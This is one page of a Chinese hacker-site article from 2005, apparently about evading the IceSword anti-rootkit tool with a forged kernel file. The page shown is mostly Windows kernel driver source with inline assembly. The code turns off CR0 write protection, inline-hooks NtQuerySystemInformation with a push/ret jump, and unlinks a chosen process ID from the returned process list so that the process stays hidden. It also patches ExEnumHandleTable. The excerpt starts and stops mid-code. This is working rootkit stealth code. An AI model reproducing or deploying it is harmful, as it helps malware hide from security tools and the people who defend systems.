推荐:利用伪造内核文件来绕过IceSword的检测

通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码

电信 ┊ 网通 ┊ 铁通 ┊ 移动　

在线人

文章搜索：

热门搜索：红客黑鹰红客技术安全动画红客培训

　业内新闻漏洞公告病毒公告电脑知识网络知识菜鸟入门攻防教程黑客攻防安全编程工具使用综合安全个人安全安全相关 Q Q安全原创精华红客人物站内事件

您现在的位置：爱国者安全网 >> 文章类 >> 原创精华 >> 文章正文

推荐:利用伪造内核文件来绕过IceSword的检测

责任编辑：古典辣M° 　更新日期：2005-12-22

bsp;           }

            Status = RepairNtosFile(
                        (DWORD)OldExEnumHandleTable,
                        (DWORD)(&CrackCodeExEnumHandleTable) );

return Status;
}

NTSTATUS NewNtQuerySystemInformation(

IN ULONG        SystemInformationClass,
OUT PVOID        SystemInformation,
IN ULONG        SystemInformationLength,
OUT PULONG        ReturnLength OPTIONAL )
{
    NTSTATUS Status;
    DWORD     Bprocess;

        _asm
        {
            pushad
            mov edi, OldNtQuerySystemInformation
            mov eax, dword ptr ResumCodeNtQuerySystemInformation[0]
            mov [edi], eax
            mov ax, word ptr ResumCodeNtQuerySystemInformation[4]
            mov [edi+4], ax
            popad
        }

        Status=OldNtQuerySystemInformation (
                            SystemInformationClass,
                            SystemInformation,
                            SystemInformationLength,
                            ReturnLength OPTIONAL );
        _asm
        {
            pushad
            mov edi, OldNtQuerySystemInformation
            mov eax, dword ptr CrackCodeNtQuerySystemInformation[0]
            mov [edi], eax
            mov ax, word ptr CrackCodeNtQuerySystemInformation[4]
            mov [edi+4], ax
            popad
        }

        if ( Status != STATUS_SUCCESS || SystemInformationClass!=5 )
        {
            return Status;
        }

        _asm
        {
            pushad

mov ecx, ProtectID
mov edi, SystemInformation

ProcessListNEnd:
            mov Bprocess, edi
            mov eax, [edi]
            test eax, eax
            jz ProcessListEnd
            add edi, eax

            mov eax, [edi+0x44]
            cmp eax, ecx
            jz FindOut
            jmp ProcessListNEnd
FindOut:
            mov ebx, [edi]
            test ebx, ebx
            jz listend
            mov eax, Bprocess
            mov edx, [eax]
            add ebx, edx
            mov [eax], ebx
            jmp hideOK

listend:
            mov eax,    Bprocess
            mov [eax], 0
hideOK:

ProcessListEnd:

            popad
        }
        return Status;
}

NTSTATUS PatchNtQuerySystemInformation ()
{
    NTSTATUS Status;

            OldNtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION) GetFunctionAddr(L"NtQuerySystemInformation");

            if ( OldNtQuerySystemInformation == NULL )
            {
                DbgPrint("Get NtQuerySystemInformation Addr Error!!");
                return STATUS_DEVICE_CONFIGURATION_ERROR;
            }

            _asm    //关中断
               {
                CLI
                MOV    EAX, CR0
                AND EAX, NOT 10000H
                MOV    CR0, EAX
            }
            _asm
            {
                pushad
                //获取 NtQuerySystemInformation 函数的地址并保留该函数的起始六个字节
                mov edi, OldNtQuerySystemInformation
                mov eax, [edi]
                mov dword ptr ResumCodeNtQuerySystemInformation[0], eax
                mov ax, [edi+4]
                mov word ptr ResumCodeNtQuerySystemInformation[4], ax

                //构造要替换的代码，使得系统调用该函数时跳到我们构造的NewNtQuerySystemInformation去执行
                mov byte ptr CrackCodeNtQuerySystemInformation[0], 0x68
                lea edi, NewNtQuerySystemInformation
                mov dword ptr CrackCodeNtQuerySystemInformation[1], edi
                mov byte ptr CrackCodeNtQuerySystemInforma

上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... 下一页 >>

上一篇文章：黑冰之校园捡肉鸡版

下一篇文章：解析Asp.net木马文件操作